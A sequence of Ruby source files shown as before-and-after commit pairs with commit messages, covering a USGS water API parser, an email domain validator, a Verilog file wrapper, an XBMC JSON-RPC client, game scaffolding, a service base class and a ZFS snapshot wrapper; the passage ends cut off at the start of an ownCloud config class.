return response if response[:status] == "Invalid Request"
time_series = response["value"]["timeSeries"]
# create a hash using gauge_id as the key
# this accounts for the USGS api response where multiple timeSeries
# objects exist for the same gauge_id
streams = Hash.new
time_series.each do |ts|
site_id = ts["sourceInfo"]["siteCode"].first["value"]
state_property = ts["sourceInfo"]["siteProperty"].find { |p| p["name"] == "stateCd" }
state = state_lookup[state_property["value"]]
values = ts["values"].first["value"]
unit = ts["variable"]["unit"]["unitAbbreviation"]
measurements = []
unless streams.key?(site_id)
streams[site_id] = {}
streams[site_id][:sitename] = ts["sourceInfo"]["siteName"]
streams[site_id][:state] = state
streams[site_id][:geolocation] = ts["sourceInfo"]["geoLocation"]["geogLocation"]
streams[site_id][:measurements] = measurements
end
values.each do |value|
streams[site_id][:measurements] << {
"dateTime" => value["dateTime"],
"unit" => unit,
"value" => value["value"]
}
end
end
# convert the hash to individual gauge objects
streams.map do |gauge_id, data|
Usgs::Gauge.new(
gauge_id: gauge_id,
site_name: data[:sitename],
state: data[:state],
geo_location: data[:geolocation],
measurements: data[:measurements]
)
end
end
private
# https://waterservices.usgs.gov/nwis/iv/?format=json&indent=on&sites=06614800&siteType=ST&siteStatus=active¶meterCd=00060
def self.make_api_request(input, date_range=nil)
base_url = "https://waterservices.usgs.gov/nwis/iv/?format=json"
if input.length == 2 && date_range
request_params = "&stateCd=#{input}&startDT=#{date_range.first.to_s}&endDT=#{date_range.last.to_s}"
elsif input.length == 2
request_params = "&stateCd=#{input}"
elsif input.length >= 8 && date_range
request_params = "&sites=#{input}&startDT=#{date_range.first.to_s}&endDT=#{date_range.last.to_s}"
elsif input.length >= 8
request_params = "&sites=#{input}"
else
return {:status => "Invalid Request"}
end
response = Faraday.get(base_url + request_params)
JSON.parse(response.body)
end
def self.state_lookup
{
"01"=>"AL","02"=>"AK","04"=>"AZ","05"=>"AR","06"=>"CA","08"=>"CO",
"09"=>"CT","10"=>"DE","11"=>"DC","12"=>"FL","13"=>"GA","15"=>"HI",
"16"=>"ID","17"=>"IL","18"=>"IN","19"=>"IA","20"=>"KS","21"=>"KY",
"22"=>"LA","23"=>"ME","24"=>"MD","25"=>"MA","26"=>"MI","27"=>"MN",
"28"=>"MS","29"=>"MO","30"=>"MT","31"=>"NE","32"=>"NV","33"=>"NH",
"34"=>"NJ","35"=>"NM","36"=>"NY","37"=>"NC","38"=>"ND","39"=>"OH",
"40"=>"OK","41"=>"OR","42"=>"PA","44"=>"RI","45"=>"SC","46"=>"SD",
"47"=>"TN","48"=>"TX","49"=>"UT","50"=>"VT","51"=>"VA","53"=>"WA",
"54"=>"WV","55"=>"WI","56"=>"WY"
}
end
end
end
|
require "valid_email2/email_validator"
module ValidEmail2
  DISPOSABLE_DOMAINS_FILE = File.expand_path("../../vendor/disposable_domains.txt", __FILE__)
  BLACKLISTED_DOMAINS_FILE = File.expand_path("../../vendor/blacklisted_domains.txt", __FILE__)

  # True if +domain+ is (a subdomain of) a known disposable-mail domain.
  def self.domain_is_disposable?(domain)
    domain_in_file?(domain, DISPOSABLE_DOMAINS_FILE)
  end

  # True if +domain+ is (a subdomain of) a blacklisted domain.
  def self.domain_is_blacklisted?(domain)
    domain_in_file?(domain, BLACKLISTED_DOMAINS_FILE)
  end

  # NOTE: `protected` has no effect on singleton (def self.) methods;
  # kept only to document intent.
  protected

  # True when +domain+ ends with any domain listed (one per line) in
  # +filename+. Uses end_with? instead of include? so that e.g.
  # "listed.com.evil.io" does not match a "listed.com" entry, File.exist?
  # instead of the deprecated File.exists?, and File.foreach so the file
  # handle is closed (the previous File.open was never closed).
  def self.domain_in_file?(domain, filename)
    return false unless File.exist?(filename)
    File.foreach(filename).any? { |line| domain.end_with?(line.chomp) }
  end
end
Use String#end_with? instead of String#include? when checking a domain for a disallowed domain
require "valid_email2/email_validator"
module ValidEmail2
  DISPOSABLE_DOMAINS_FILE = File.expand_path("../../vendor/disposable_domains.txt", __FILE__)
  BLACKLISTED_DOMAINS_FILE = File.expand_path("../../vendor/blacklisted_domains.txt", __FILE__)

  # True if +domain+ is (a subdomain of) a known disposable-mail domain.
  def self.domain_is_disposable?(domain)
    domain_in_file?(domain, DISPOSABLE_DOMAINS_FILE)
  end

  # True if +domain+ is (a subdomain of) a blacklisted domain.
  def self.domain_is_blacklisted?(domain)
    domain_in_file?(domain, BLACKLISTED_DOMAINS_FILE)
  end

  # NOTE: `protected` has no effect on singleton (def self.) methods;
  # kept only to document intent.
  protected

  # True when +domain+ ends with any domain listed (one per line) in
  # +filename+. Uses File.exist? instead of File.exists? (deprecated and
  # removed in Ruby 3.2) and File.foreach so the file handle is closed
  # (the previous File.open was never closed).
  def self.domain_in_file?(domain, filename)
    return false unless File.exist?(filename)
    File.foreach(filename).any? { |line| domain.end_with?(line.chomp) }
  end
end
|
module Verilog
  # Thin wrapper around a Verilog source file on disk: holds a filename,
  # an optional :path, and the file's text in #contents.
  class File #< Class::File
    attr_reader :filename, :options
    attr_accessor :contents

    def initialize(filename, options = {})
      @filename = filename
      @options = options
      @options[:path] ||= ''
    end

    # Alias for #read.
    def read_from_disk
      read
    end

    # Load the file's bytes from disk into #contents. If the file is
    # missing, print an error instead (matching the original behavior).
    def read
      unless ::File.exist?(absolute_filename)
        # TODO raise correct exception here
        puts "ERROR File Not Found #{absolute_filename}"
        return
      end
      ::File.open(absolute_filename, "rb") { |io| @contents = io.read }
    end

    # Write #contents back to disk, replacing the file.
    def save
      ::File.open(absolute_filename, "w") { |io| io.write @contents }
    end

    # Full path built from the :path option and the filename.
    def absolute_filename
      ::File.join(@options[:path], @filename)
    end
  end
end
Updated Verilog::File with includes and instantiations
module Verilog
  # Wrapper around a Verilog source file that can also extract structural
  # information (module name, instantiations, `include directives) from
  # its text with best-effort regexes.
  class File #< Class::File
    attr_reader :filename, :options
    attr_accessor :contents

    def initialize( filename, options={} )
      @filename = filename
      @options = options
      @options[:path] ||= ''
    end

    # Alias method for #read.
    def read_from_disk
      read()
    end

    # Load the file's bytes from disk into #contents; prints an error if
    # the file does not exist.
    def read
      if ::File.exist?( absolute_filename )
        ::File.open( absolute_filename, "rb") do |f|
          @contents = f.read
        end
      else
        #TODO raise correct exception here
        puts "ERROR File Not Found #{absolute_filename}"
      end
    end

    # Write #contents back to disk, replacing the file.
    def save
      ::File.open( absolute_filename, "w" ) do |f|
        f.write @contents
      end
    end

    # Full path built from the :path option and the filename.
    def absolute_filename
      ::File.join( @options[:path], @filename )
    end

    # Name of the first module declaration, or "" when none is found.
    # Guarded so it no longer raises NoMethodError before #read is called.
    def module_name
      return "" if @contents.nil?
      if @contents.match(/(^\s*module *)(.*)(;|\s*\()/i)
        return $2
      else
        return ""
      end
    end

    # Names of modules instantiated in the file (regex best-effort).
    def instantiations
      return [] if @contents.nil?
      inst = []
      @contents.scan(/(^\s*)(\w*)\s+\w+\s*(\([.,\(\)\w\s]*\))?;/mi){ inst << $2 }
      # Hack: the module declaration itself also matches the instantiation
      # syntax, so remove it via array subtraction.
      inst = inst - ['module']
      return inst
    end

    # Filenames referenced by `include directives.
    def includes
      return [] if @contents.nil?
      inc = []
      @contents.scan(/(^\s*`include [\'\"])(.*)([\'\"])/i){ inc << $2 }
      return inc
    end
  end #class File
end #module Verilog
|
module Vesr
# Gem release version.
VERSION = "0.12.4"
end
Bump to 0.12.5
module Vesr
# Gem release version.
VERSION = "0.12.5"
end
|
require 'typhoeus'
require 'oj'
require 'simple_oauth'
require 'pry' # TODO: remove me once done
require 'vimeo_videos/version'
require 'vimeo_videos/exceptions'
require 'vimeo_videos/client'
require 'vimeo_videos/base_request'
require 'vimeo_videos/request'
require 'vimeo_videos/upload_request'
require 'vimeo_videos/upload'
# Upload videos to Vimeo through V2 API.
module VimeoVideos
end
Don't load pry
require 'typhoeus'
require 'oj'
require 'simple_oauth'
# require 'pry' # TODO: remove me once done
require 'vimeo_videos/version'
require 'vimeo_videos/exceptions'
require 'vimeo_videos/client'
require 'vimeo_videos/base_request'
require 'vimeo_videos/request'
require 'vimeo_videos/upload_request'
require 'vimeo_videos/upload'
# Upload videos to Vimeo through V2 API.
module VimeoVideos
end
|
module VIPS
# Gem release version.
VERSION = "0.1.0"
end
0.1.1
module VIPS
# Gem release version.
VERSION = "0.1.1"
end
|
# This program allows easy interaction with XBMC's json-rpc API.
# Connection information is provided, and connection is created
# and stored for repeated use. The list of classes and methods
# available are retrieved from the XBMC json-rpc API, and can be
# accessed or referenced using instance.commands or
# instance.print_commands. An command can be searched for using
# instance.apropos
#
# Author:: atom smith (http://twitter.com/re5et)
# Copyright:: Copyright (c) 2010 atom smith
# License:: Distributes under the same terms as Ruby
require 'rubygems'
require 'net/http'
require 'json'
# The XBMC_JSONRPC module is a namespace / wrapper
module XBMC_JSONRPC
# Attempt to create connection with xbmc server, and retrieve available
# commands. Accepts connection information arguments and if successful
# returns a new connection
def self.new(options = {})
@connection = XBMC_JSONRPC::Connection.new(options)
if @connection.command('JSONRPC.Ping')
# Build a name => metadata hash from the Introspect listing; each
# command entry's first pair holds its fully-qualified name.
commands = @connection.command('JSONRPC.Introspect')['result']['commands']
@commands = {}
commands.each do |command|
command_name = command.shift[1]
@commands[command_name] = command
end
# NOTE(review): intentionally returns the module itself (not an
# instance) so callers keep using XBMC_JSONRPC.command etc.
return self
end
return false
end
# Make an API call to the instance XBMC server
# Forward a JSON-RPC call (e.g. 'JSONRPC.Ping') with optional params to
# the stored connection; requires XBMC_JSONRPC.new to have been called.
def self.command(method,args = {})
@connection.command(method, args)
end
# returns all available commands returned by JSON.Introspect
# (a Hash of command name => metadata, populated by self.new).
def self.commands
@commands
end
# nicely print out all available commands.
# useful at command line / irb / etc
def self.get_commands
  @commands.each_key { |name| pp_command(name) }
  nil
end
# finds and prettily prints appropriate commands based on provided keyword;
# a command matches when the keyword appears in its name or description.
def self.apropos(find)
  pattern = /#{find}/im
  matches = @commands.select do |name, info|
    name =~ pattern || info['description'] =~ pattern
  end.keys
  if matches.empty?
    puts "\n\nNo commands found, try being less specific\n\n"
  else
    matches.each { |name| pp_command(name) }
  end
  nil
end
# prettily print out requested command.
# Prints the command name and its description, substituting a placeholder
# when the introspection data has an empty description. Also handles a
# nil description, which previously raised NoMethodError on #empty?,
# and replaces the confusing `unless !…` double negative.
def self.pp_command(command)
  description = @commands[command]['description']
  description = "<no description exists for #{command}>" if description.nil? || description.empty?
  puts "\n\t#{command}"
  puts "\t\t#{description}\n\n"
end
# Class to create and store connection information for xbmc server
# also handles actual json back and forth.
class Connection
# Merge caller-supplied options over XBMC's defaults (localhost:8080,
# user "xbmc", empty password) and build the JSON-RPC endpoint URL once.
def initialize(options)
connection_info = {
:server => '127.0.0.1',
:port => '8080',
:user => 'xbmc',
:pass => ''
}
@connection_info = connection_info.merge(options)
@url = URI.parse("http://#{@connection_info[:server]}:#{@connection_info[:port]}/jsonrpc")
end
# POST a single JSON-RPC 2.0 request and return the parsed response.
# method - fully qualified method name, e.g. "VideoLibrary.GetMovies"
# params - Hash serialized into the request's "params" member
# Returns the decoded response Hash on HTTP success, raises via
# Net::HTTPResponse#error! on an HTTP error status, or prints a notice
# and returns false when the request itself fails with an exception.
# NOTE(review): the request "id" is hard-coded to 1, so responses cannot
# be correlated if calls were ever issued concurrently.
def command(method, params = {})
req = Net::HTTP::Post.new(@url.path)
req.basic_auth @connection_info[:user], @connection_info[:pass]
req.add_field 'Content-Type', 'application/json'
req.body = {
"id" => 1,
"jsonrpc" => "2.0",
"method" => method,
"params" => params
}.to_json
res = Net::HTTP.new(@url.host, @url.port).start {|http| http.request(req) }
if res.kind_of? Net::HTTPSuccess
return JSON.parse(res.body)
else
return res.error!
end
rescue StandardError
print "Unable to connect to server specified\n", $!
return false
end
end
# utility class for others to inherit from. For now uses method missing
# to make all calls to the send_command because there is no meaningful
# difference between namespaces / methods at the moment.
class APIBase
  # get the correct api namespace to use (the segment after the module
  # name in the subclass's constant path, e.g. "VideoLibrary").
  def self.namespace
    @namespace ||= name.to_s.split('::')[1]
  end

  # pass on namespace + method and arguments
  def self.method_missing(method, args = {})
    XBMC_JSONRPC.command("#{namespace}.#{method}", args)
  end

  # Every method name is handled via method_missing, so advertise that
  # fact: without this, respond_to? lies about dynamically dispatched
  # API calls (standard companion to any method_missing override).
  def self.respond_to_missing?(method, include_private = false)
    true
  end

  # show commands for namespace
  def self.commands
    XBMC_JSONRPC.commands.keys.grep(/#{namespace}\./) { |command| XBMC_JSONRPC.pp_command(command) }
  end
end
class JSONRPC < APIBase
# def self.Introspect
# end
# def self.Version
# end
# def self.Permission
# end
# def self.Ping
# end
# def self.Announce
# end
end
class Player < APIBase
# def self.GetActivePlayers
# end
end
class AudioPlayer < APIBase
# same methods as VideoPlayer
end
class VideoPlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.BigSkipBackward
# end
# def self.BigSkipForward
# end
# def self.SmallSkipBackward
# end
# def self.SmallSkipForward
# end
# def self.Rewind
# end
# def self.Forward
# end
# def self.GetTime
# end
# def self.GetTimeMS
# end
# def self.GetPercentage
# end
# def self.SeekTime
# end
# def self.SeekPercentage
# end
end
class PicturePlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.MoveLeft
# end
# def self.MoveRight
# end
# def self.MoveDown
# end
# def self.MoveUp
# end
# def self.ZoomOut
# end
# def self.ZoomIn
# end
# def self.Zoom
# end
# def self.Rotate
# end
end
class VideoPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class AudioPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class Playlist < APIBase
# def self.Create
# end
# def self.Destroy
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Remove
# end
# def self.Swap
# end
# def self.Shuffle
# end
end
class Files < APIBase
# def self.GetSources
# end
# def self.Download
# end
# def self.GetDirectory
# end
end
class AudioLibrary < APIBase
# def self.GetArtists
# end
# def self.GetAlbums
# end
# def self.GetSongs
# end
# def self.ScanForContent
# end
end
class VideoLibrary < APIBase
# def self.GetMovies
# end
# def self.GetTVShows
# end
# def self.GetSeasons
# end
# def self.GetEpisodes
# end
# def self.GetMusicVideoAlbums
# end
# def self.GetMusicVideos
# end
# def self.GetRecentlyAddedMovies
# end
# def self.GetRecentlyAddedEpisodes
# end
# def self.GetRecentlyAddedMusicVideos
# end
# def self.ScanForContent
# end
end
class System < APIBase
# def self.Shutdown
# end
# def self.Suspend
# end
# def self.Hibernate
# end
# def self.Reboot
# end
# def self.GetInfoLabels
# end
# def self.GetInfoBooleans
# end
end
class XBMC < APIBase
# def self.GetVolume
# end
# def self.SetVolume
# end
# def self.ToggleMute
# end
# def self.Play
# end
# def self.StartSlideShow
# end
# def self.Log
# end
# def self.Quit
# end
end
end
Allow setting an `id` per request
# This program allows easy interaction with XBMC's json-rpc API.
# Connection information is provided, and connection is created
# and stored for repeated use. The list of classes and methods
# available are retrieved from the XBMC json-rpc API, and can be
# accessed or referenced using instance.commands or
# instance.print_commands. A command can be searched for using
# instance.apropos
#
# Author:: atom smith (http://twitter.com/re5et)
# Copyright:: Copyright (c) 2010 atom smith
# License:: Distributes under the same terms as Ruby
require 'rubygems'
require 'net/http'
require 'json'
# The XBMC_JSONRPC module is a namespace / wrapper
module XBMC_JSONRPC
# Attempt to create connection with xbmc server, and retrieve available
# commands. Accepts connection information arguments and if successful
# returns a new connection
def self.new(options = {})
@connection = XBMC_JSONRPC::Connection.new(options)
if @connection.command('JSONRPC.Ping')
commands = @connection.command('JSONRPC.Introspect')['result']['commands']
@commands = {}
commands.each do |command|
command_name = command.shift[1]
@commands[command_name] = command
end
return self
end
return false
end
# Make an API call to the instance XBMC server
def self.command(method,args = {})
@connection.command(method, args)
end
# returns all available commands returned by JSON.Introspect
def self.commands
@commands
end
# nicely print out all available commands.
# useful at command line / irb / etc
def self.get_commands
@commands.each {|k,v| self.pp_command k }
return nil
end
# finds and prettily prints appropriate commands based on provided keyword
def self.apropos(find)
regexp = /#{find}/im
matches = []
@commands.each do |k,v|
matches.push(k) if k =~ regexp || v['description'] =~ regexp
end
if matches.empty?
puts "\n\nNo commands found, try being less specific\n\n"
else
matches.each {|command| self.pp_command command }
end
return nil
end
# prettily print out requested command
def self.pp_command(command)
description = @commands[command]['description']
description = "<no description exists for #{command}>" unless !description.empty?
puts "\n\t#{command}"
puts "\t\t#{description}\n\n"
end
# Class to create and store connection information for xbmc server
# also handles actual json back and forth.
class Connection
  # Merge caller-supplied options over XBMC's defaults (localhost:8080,
  # user "xbmc", empty password) and build the JSON-RPC endpoint URL once.
  def initialize(options)
    connection_info = {
      :server => '127.0.0.1',
      :port => '8080',
      :user => 'xbmc',
      :pass => ''
    }
    @connection_info = connection_info.merge(options)
    @url = URI.parse("http://#{@connection_info[:server]}:#{@connection_info[:port]}/jsonrpc")
  end

  # POST a single JSON-RPC 2.0 request and return the parsed response.
  # method - fully qualified method name, e.g. "VideoLibrary.GetMovies"
  # params - Hash of parameters; an optional :id entry overrides the
  #          JSON-RPC request id (defaults to 1) and is not forwarded.
  # Returns the decoded response Hash on HTTP success, raises via
  # Net::HTTPResponse#error! on an HTTP error status, or prints a notice
  # and returns false when the request fails with an exception.
  # BUG FIX: works on a copy of params — the original `params.delete :id`
  # mutated the caller's hash, silently stripping :id from any hash the
  # caller reused across requests.
  def command(method, params = {})
    params = params.dup
    command_id = params.delete(:id)
    req = Net::HTTP::Post.new(@url.path)
    req.basic_auth @connection_info[:user], @connection_info[:pass]
    req.add_field 'Content-Type', 'application/json'
    req.body = {
      "id" => command_id || 1,
      "jsonrpc" => "2.0",
      "method" => method,
      "params" => params
    }.to_json
    res = Net::HTTP.new(@url.host, @url.port).start { |http| http.request(req) }
    if res.kind_of? Net::HTTPSuccess
      return JSON.parse(res.body)
    else
      return res.error!
    end
  rescue StandardError
    print "Unable to connect to server specified\n", $!
    return false
  end
end
# utility class for others to inherit from. For now uses method missing
# to make all calls to the send_command because there is no meaningful
# difference between namespaces / methods at the moment.
class APIBase
# get the correct api namespace to use
def self.namespace
@namespace = @namespace || self.name.to_s.split('::')[1]
end
# pass on namespace + method and arguments
def self.method_missing(method, args = {})
XBMC_JSONRPC.command("#{self.namespace}.#{method}", args)
end
# show commands for namespace
def self.commands
XBMC_JSONRPC.commands.keys.grep(/#{self.namespace}\./) {|command| XBMC_JSONRPC.pp_command(command) }
end
end
class JSONRPC < APIBase
# def self.Introspect
# end
# def self.Version
# end
# def self.Permission
# end
# def self.Ping
# end
# def self.Announce
# end
end
class Player < APIBase
# def self.GetActivePlayers
# end
end
class AudioPlayer < APIBase
# same methods as VideoPlayer
end
class VideoPlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.BigSkipBackward
# end
# def self.BigSkipForward
# end
# def self.SmallSkipBackward
# end
# def self.SmallSkipForward
# end
# def self.Rewind
# end
# def self.Forward
# end
# def self.GetTime
# end
# def self.GetTimeMS
# end
# def self.GetPercentage
# end
# def self.SeekTime
# end
# def self.SeekPercentage
# end
end
class PicturePlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.MoveLeft
# end
# def self.MoveRight
# end
# def self.MoveDown
# end
# def self.MoveUp
# end
# def self.ZoomOut
# end
# def self.ZoomIn
# end
# def self.Zoom
# end
# def self.Rotate
# end
end
class VideoPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class AudioPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class Playlist < APIBase
# def self.Create
# end
# def self.Destroy
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Remove
# end
# def self.Swap
# end
# def self.Shuffle
# end
end
class Files < APIBase
# def self.GetSources
# end
# def self.Download
# end
# def self.GetDirectory
# end
end
class AudioLibrary < APIBase
# def self.GetArtists
# end
# def self.GetAlbums
# end
# def self.GetSongs
# end
# def self.ScanForContent
# end
end
class VideoLibrary < APIBase
# def self.GetMovies
# end
# def self.GetTVShows
# end
# def self.GetSeasons
# end
# def self.GetEpisodes
# end
# def self.GetMusicVideoAlbums
# end
# def self.GetMusicVideos
# end
# def self.GetRecentlyAddedMovies
# end
# def self.GetRecentlyAddedEpisodes
# end
# def self.GetRecentlyAddedMusicVideos
# end
# def self.ScanForContent
# end
end
class System < APIBase
# def self.Shutdown
# end
# def self.Suspend
# end
# def self.Hibernate
# end
# def self.Reboot
# end
# def self.GetInfoLabels
# end
# def self.GetInfoBooleans
# end
end
class XBMC < APIBase
# def self.GetVolume
# end
# def self.SetVolume
# end
# def self.ToggleMute
# end
# def self.Play
# end
# def self.StartSlideShow
# end
# def self.Log
# end
# def self.Quit
# end
end
end
|
module Yeah::Utility
def self.make_project(name)
structure = {}
structure[name] = {
entities: {},
visuals: {},
maps: {},
assets: {},
config: {},
'game.rb' => <<-eoc.unindent
require "yeah"
include Yeah
class #{name.classify}Game < Game
end
eoc
}
make_file_structure(structure)
end
# TODO: clean up this monster
def self.make_file_structure(structure)
make_recursively = lambda do |struct, base_loc=""|
struct.each do |key, value|
new_loc = "#{base_loc}#{key}"
case value
when Hash
new_dir = "#{new_loc}/"
Dir.mkdir(new_dir)
make_recursively.call struct[key], new_dir
when String
File.open(new_loc, 'w') { |f| f.write(value) }
end
end
end
make_recursively.call structure
end
def self.load_project
require_recursively('.')
end
def self.require_recursively(dir)
Pow(dir).files.select { |f| f.extension == 'rb' }.each { |f| require f }
Pow(dir).directories.each { |sd| require_recursively(sd) }
end
def self.project_game_class
game_class_name = Object.constants.find { |c| c[-4..-1] == "Game" }
Kernel.const_get(game_class_name)
end
def self.run_project
project_game_class.new.start
end
end
Patch to ensure Pow's File#extension exists (aliases the gem's misspelled #extention when necessary)
# Project scaffolding and loading helpers for the Yeah game framework.
module Yeah::Utility
# Create a new project skeleton: the standard directories plus a stub
# game.rb that defines "<Name>Game < Game".
# NOTE(review): relies on String#classify (ActiveSupport) and
# String#unindent (non-stdlib) being available — confirm dependencies.
def self.make_project(name)
structure = {}
structure[name] = {
entities: {},
visuals: {},
maps: {},
assets: {},
config: {},
'game.rb' => <<-eoc.unindent
require "yeah"
include Yeah
class #{name.classify}Game < Game
end
eoc
}
make_file_structure(structure)
end
# TODO: clean up this monster
# Recursively materialise a nested Hash as directories (Hash values)
# and files (String values) under the current working directory.
def self.make_file_structure(structure)
make_recursively = lambda do |struct, base_loc=""|
struct.each do |key, value|
new_loc = "#{base_loc}#{key}"
case value
when Hash
new_dir = "#{new_loc}/"
Dir.mkdir(new_dir)
make_recursively.call struct[key], new_dir
when String
File.open(new_loc, 'w') { |f| f.write(value) }
end
end
end
make_recursively.call structure
end
# Require every .rb file of the project rooted at the current directory.
def self.load_project
require_recursively('.')
end
# Require all .rb files under dir, depth-first, via the Pow gem.
def self.require_recursively(dir)
# Older Pow releases misspell the method as #extention; alias it so the
# #extension call below works with either spelling.
pow_spells_correctly = Pow::Base.method_defined? :extension
if !pow_spells_correctly
Pow::Base.class_eval "alias_method :extension, :extention"
end
Pow(dir).files.select { |f| f.extension == 'rb' }.each { |f| require f }
Pow(dir).directories.each { |sd| require_recursively(sd) }
end
# Locate the project's Game subclass by naming convention.
# NOTE(review): picks the first top-level constant whose name ends in
# "Game" — assumes the project defines exactly one; confirm.
def self.project_game_class
game_class_name = Object.constants.find { |c| c[-4..-1] == "Game" }
Kernel.const_get(game_class_name)
end
# Instantiate the project's game class and start its main loop.
def self.run_project
project_game_class.new.start
end
end
|
module Yuba
  # Base class for service objects: subclasses declare allowed keyword
  # properties, which are exposed as readers on each instance.
  class Service
    class_attribute :_properties
    self._properties = {}

    class << self
      # Build an instance from the given keyword args (if any) and
      # invoke #call on it.
      def call(**args)
        return new.call if args.empty?
        new(**args).call
      end

      # Declare an allowed keyword property for this service class.
      def property(name, options = {})
        _properties[name.to_sym] = options
      end
    end

    # Rejects any keyword not declared via `property`, then defines a
    # singleton reader for each supplied keyword returning its value.
    def initialize(**args)
      args.keys.each do |key|
        unless _properties.has_key?(key.to_sym)
          raise ArgumentError, "missing 'property :#{key}' in #{self.class.name} class"
        end
      end
      args.each do |key, value|
        define_singleton_method key do
          value
        end
      end
    end

    def build_form(**args)
      form_class.build(**args)
    end

    def form_class
      Object.const_get(form_class_name)
    end

    # BUG FIX: previously resolved via form_class_name, so this returned
    # the form class instead of the view model; view_model_class_name
    # was dead code.
    def view_model_class
      Object.const_get(view_model_class_name)
    end

    private

    def form_class_name
      self.class.name.sub(/::.+Service/, 'Form')
    end

    def view_model_class_name
      self.class.name.sub(/Service\z/, 'ViewModel')
    end
  end
end
Add setup method like call
module Yuba
  # Base class for service objects: subclasses declare allowed keyword
  # properties, which are exposed as readers on each instance.
  class Service
    class_attribute :_properties
    self._properties = {}

    class << self
      # Build an instance from the given keyword args (if any) and
      # invoke #call on it.
      def call(**args)
        return new.call if args.empty?
        new(**args).call
      end

      # Build an instance from the given keyword args (if any) and
      # invoke #setup on it — mirrors .call for two-phase services.
      def setup(**args)
        return new.setup if args.empty?
        new(**args).setup
      end

      # Declare an allowed keyword property for this service class.
      def property(name, options = {})
        _properties[name.to_sym] = options
      end
    end

    # Rejects any keyword not declared via `property`, then defines a
    # singleton reader for each supplied keyword returning its value.
    def initialize(**args)
      args.keys.each do |key|
        unless _properties.has_key?(key.to_sym)
          raise ArgumentError, "missing 'property :#{key}' in #{self.class.name} class"
        end
      end
      args.each do |key, value|
        define_singleton_method key do
          value
        end
      end
    end

    def build_form(**args)
      form_class.build(**args)
    end

    def form_class
      Object.const_get(form_class_name)
    end

    # BUG FIX: previously resolved via form_class_name, so this returned
    # the form class instead of the view model; view_model_class_name
    # was dead code.
    def view_model_class
      Object.const_get(view_model_class_name)
    end

    private

    def form_class_name
      self.class.name.sub(/::.+Service/, 'Form')
    end

    def view_model_class_name
      self.class.name.sub(/Service\z/, 'ViewModel')
    end
  end
end
|
module Zfs
class Snapshot
@@stale_snapshot_size = false
attr_reader :name
def initialize(name, used)
@name = name
@used = used
end
def used
if @@stale_snapshot_size
cmd = "zfs get -Hp -o value used #{@name}"
@used = %x[#{cmd}].to_i
end
@used
end
### Find all snapshots in the given interval
### @param String match_on The string to match on snapshots
def self.find(match_on=nil)
snapshots = []
cmd = "zfs list -H -t snapshot -o name,used -S name"
IO.popen cmd do |io|
io.readlines.each do |line|
line.chomp!
if match_on.nil? or line.include?(match_on)
snapshot_name,used = line.split(' ')
snapshots << self.new(snapshot_name, used.to_i)
end
end
end
snapshots
end
### Create a snapshot
def self.create(snapshot, options = {})
flags=[]
flags << "-r" if options['recursive']
cmd = "zfs snapshot #{flags.join(" ")} #{snapshot}"
puts cmd
system(cmd) unless $dry_run
end
### Destroy a snapshot
def destroy(options = {})
# If destroying a snapshot, need to flag all other snapshot sizes as stale
# so they will be relooked up.
@@stale_snapshot_size = true
# Default to deferred snapshot destroying
flags=["-d"]
flags << "-r" if options['recursive']
cmd = "zfs destroy #{flags.join(" ")} #{@name}"
puts cmd
system(cmd) unless $dry_run
end
end
end
Support creating new snapshot without knowing its size
module Zfs
# Thin wrapper around the `zfs` CLI for listing, creating and
# destroying snapshots. Respects the global $dry_run flag.
# NOTE(review): snapshot names are interpolated into shell commands
# unescaped — safe only for trusted dataset names; confirm callers.
class Snapshot
# Set to true once any snapshot is destroyed: destroying one snapshot
# changes the reported size of its neighbours, so cached sizes go stale.
@@stale_snapshot_size = false
attr_reader :name
# name - fully qualified snapshot name (pool/fs@snap)
# used - bytes used, or nil to look the value up lazily via `zfs get`
def initialize(name, used=nil)
@name = name
@used = used
end
# Bytes used by this snapshot. Shells out to `zfs get` when the value
# was never supplied or may have been invalidated by a destroy.
def used
if @used.nil? or @@stale_snapshot_size
cmd = "zfs get -Hp -o value used #{@name}"
@used = %x[#{cmd}].to_i
end
@used
end
### Find all snapshots in the given interval
### @param String match_on The string to match on snapshots
def self.find(match_on=nil)
snapshots = []
cmd = "zfs list -H -t snapshot -o name,used -S name"
IO.popen cmd do |io|
io.readlines.each do |line|
line.chomp!
if match_on.nil? or line.include?(match_on)
snapshot_name,used = line.split(' ')
snapshots << self.new(snapshot_name, used.to_i)
end
end
end
snapshots
end
### Create a snapshot
# snapshot - full snapshot name; options['recursive'] adds -r.
# Prints the command; skips execution when $dry_run is set.
def self.create(snapshot, options = {})
flags=[]
flags << "-r" if options['recursive']
cmd = "zfs snapshot #{flags.join(" ")} #{snapshot}"
puts cmd
system(cmd) unless $dry_run
end
### Destroy a snapshot
def destroy(options = {})
# If destroying a snapshot, need to flag all other snapshot sizes as stale
# so they will be relooked up.
@@stale_snapshot_size = true
# Default to deferred snapshot destroying
flags=["-d"]
flags << "-r" if options['recursive']
cmd = "zfs destroy #{flags.join(" ")} #{@name}"
puts cmd
system(cmd) unless $dry_run
end
end
end
|
Created a library to manage the ownCloud configuration file
require 'json'
module OwnCloud
  # Reads and writes ownCloud's PHP configuration file (config.php) by
  # round-tripping the $CONFIG array through the `php` binary and JSON.
  class Config
    attr_reader :options

